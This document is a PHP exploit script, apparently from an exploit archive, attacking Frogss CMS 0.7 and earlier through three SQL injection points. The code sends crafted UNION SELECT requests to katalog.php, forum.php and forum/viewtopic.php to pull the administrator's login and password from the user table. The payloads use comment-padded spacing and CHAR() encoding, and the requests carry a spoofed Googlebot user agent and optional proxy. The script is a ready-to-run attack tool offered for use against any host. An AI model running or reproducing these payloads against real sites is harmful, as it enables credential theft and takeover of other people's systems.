Frogss CMS 0.7 Remote SQL Injection Exploit

                                                <?
print&nbsp;(\"Autor:&nbsp;Kacper
Contact:&nbsp;[email protected]
Homepage:&nbsp;http://www.rahim.webd.pl/
Irc:&nbsp;irc.milw0rm.com:6667&nbsp;#devilteam&nbsp;

Pozdro&nbsp;dla&nbsp;wszystkich&nbsp;z&nbsp;kanalu&nbsp;IRC&nbsp;oraz&nbsp;forum&nbsp;DEVIL&nbsp;TEAM.

Frogss&nbsp;CMS&nbsp;<=&nbsp;0.7&nbsp;SQL&nbsp;Injection&nbsp;Exploit
script&nbsp;homepage:&nbsp;http://frogss.com/


\");
if&nbsp;($argc<4)&nbsp;{
print_r(\'
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage:&nbsp;php&nbsp;\'.$argv[0].\'&nbsp;host&nbsp;path&nbsp;Vulnerabilities_number&nbsp;OPTIONS
host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname)
path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frogss&nbsp;path
Vulnerabilities&nbsp;number:&nbsp;1&nbsp;or&nbsp;2&nbsp;or&nbsp;3
Options:
&nbsp;-p[port]:&nbsp;&nbsp;&nbsp;&nbsp;specify&nbsp;a&nbsp;port&nbsp;other&nbsp;than&nbsp;80
&nbsp;-P[ip:port]:&nbsp;specify&nbsp;a&nbsp;proxy
Example:
php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/frogss/&nbsp;1
php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/frogss/&nbsp;2
php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/frogss/&nbsp;3
php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/frogss/&nbsp;1&nbsp;-P1.1.1.1:80
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
\');
die;
}
error_reporting(7);
ini_set(\"max_execution_time\",0);
ini_set(\"default_socket_timeout\",5);

function&nbsp;quick_dump($string)
{
&nbsp;&nbsp;$result=\'\';$exa=\'\';$cont=0;
&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;))
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;.\";}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;\".$string[$i];}
&nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2)
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;0\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\"
\";&nbsp;$exa.=\"
\";}
&nbsp;&nbsp;}
&nbsp;return&nbsp;$exa.\"
\".$result;
}
$proxy_regex&nbsp;=&nbsp;\'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\';

function&nbsp;wyslijpakiet($packet)
{
&nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex;
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;\'.$host.\':\'.$port;&nbsp;die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
	$c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\';die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\':\',$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;$parts[1]=(int)$parts[1];
&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"Connecting&nbsp;to&nbsp;\".$parts[0].\":\".$parts[1].\"&nbsp;proxy...
\";
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;proxy...\';die;
	}
&nbsp;&nbsp;}
&nbsp;&nbsp;fputs($ock,$packet);
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$action=$argv[3];
$port=80;
$proxy=\"\";
for&nbsp;($i=3;&nbsp;$i<$argc;&nbsp;$i++){
$temp=$argv[$i][0].$argv[$i][1];
if&nbsp;($temp==\"-p\")
{
&nbsp;&nbsp;$port=(int)str_replace(\"-p\",\"\",$argv[$i]);
}
if&nbsp;($temp==\"-P\")
{
&nbsp;&nbsp;$proxy=str_replace(\"-P\",\"\",$argv[$i]);
}
}
if&nbsp;(($path[0]<>\'/\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\'/\'))&nbsp;{die(\"Bad&nbsp;path!\");}
if&nbsp;($proxy==\'\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\'http://\'.$host.\':\'.$port.$path;}
if&nbsp;(($action!=1)&nbsp;and&nbsp;($action!=2)&nbsp;and&nbsp;($action!=3))&nbsp;{echo&nbsp;\"select&nbsp;Vulnerabilities&nbsp;number&nbsp;(1,2,3)&nbsp;...\";}
function&nbsp;char_convert($my_string)
{
&nbsp;&nbsp;$encoded=\"CHAR(\";
&nbsp;&nbsp;for&nbsp;($k=0;&nbsp;$k<=strlen($my_string)-1;&nbsp;$k++)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$encoded.=ord($my_string[$k]);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($k==strlen($my_string)-1)&nbsp;{$encoded.=\")\";}
&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;{$encoded.=\",\";}
&nbsp;&nbsp;}
&nbsp;&nbsp;return&nbsp;$encoded;
}
if&nbsp;($action==1)
{
print&nbsp;\"+++++++++++++++++++++++++++++++++++++++++++++++++
\";
print&nbsp;\"Frogss&nbsp;CMS&nbsp;<=&nbsp;0.7&nbsp;SQL&nbsp;Injection&nbsp;Exploit&nbsp;by&nbsp;Kacper
\";
print&nbsp;\"Vulnerabilities&nbsp;Number:&nbsp;1
\";
$packet&nbsp;=\"GET&nbsp;\".$p.\"katalog.php?dzial=-99999999\'/**/UNION/**/SELECT/**/0,CONCAT(\".char_convert(\"<!--[\").\",haslo,\".char_convert(\"]-->\").\")/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"katalog.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$pass=$t2[0];
echo&nbsp;\"Admin&nbsp;Password:&nbsp;\".$pass.\"
\";
$packet&nbsp;=\"GET&nbsp;\".$p.\"katalog.php?dzial=-99999999\'/**/UNION/**/SELECT/**/0,CONCAT(\".char_convert(\"<!--[\").\",login,\".char_convert(\"]-->\").\")/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"katalog.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$login=$t2[0];
echo&nbsp;\"Admin&nbsp;Login:&nbsp;\".$login.\"
\";
}
elseif&nbsp;($action==2)
{
print&nbsp;\"+++++++++++++++++++++++++++++++++++++++++++++++++
\";
print&nbsp;\"Frogss&nbsp;CMS&nbsp;<=&nbsp;0.7&nbsp;SQL&nbsp;Injection&nbsp;Exploit&nbsp;by&nbsp;Kacper
\";
print&nbsp;\"Vulnerabilities&nbsp;Number:&nbsp;2
\";
$packet&nbsp;=\"GET&nbsp;\".$p.\"forum.php?d=1&t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(\".char_convert(\"<!--[\").\",haslo,\".char_convert(\"]-->\").\"),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"forum.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$pass=$t2[0];
echo&nbsp;\"Admin&nbsp;Password:&nbsp;\".$pass.\"
\";
$packet&nbsp;=\"GET&nbsp;\".$p.\"forum.php?d=1&t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(\".char_convert(\"<!--[\").\",login,\".char_convert(\"]-->\").\"),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"forum.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$login=$t2[0];
echo&nbsp;\"Admin&nbsp;Login:&nbsp;\".$login.\"
\";
}
elseif&nbsp;($action==3)
{
print&nbsp;\"+++++++++++++++++++++++++++++++++++++++++++++++++
\";
print&nbsp;\"Frogss&nbsp;CMS&nbsp;<=&nbsp;0.7&nbsp;SQL&nbsp;Injection&nbsp;Exploit&nbsp;by&nbsp;Kacper
\";
print&nbsp;\"Vulnerabilities&nbsp;Number:&nbsp;3
\";
$packet&nbsp;=\"GET&nbsp;\".$p.\"forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(\".char_convert(\"<!--[\").\",haslo,\".char_convert(\"]-->\").\"),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"forum/viewtopic.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$pass=$t2[0];
echo&nbsp;\"Admin&nbsp;Password:&nbsp;\".$pass.\"
\";
$packet&nbsp;=\"GET&nbsp;\".$p.\"forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(\".char_convert(\"<!--[\").\",login,\".char_convert(\"]-->\").\"),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"forum/viewtopic.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$login=$t2[0];
echo&nbsp;\"Admin&nbsp;Login:&nbsp;\".$login.\"
\";
}
?>

&nbsp;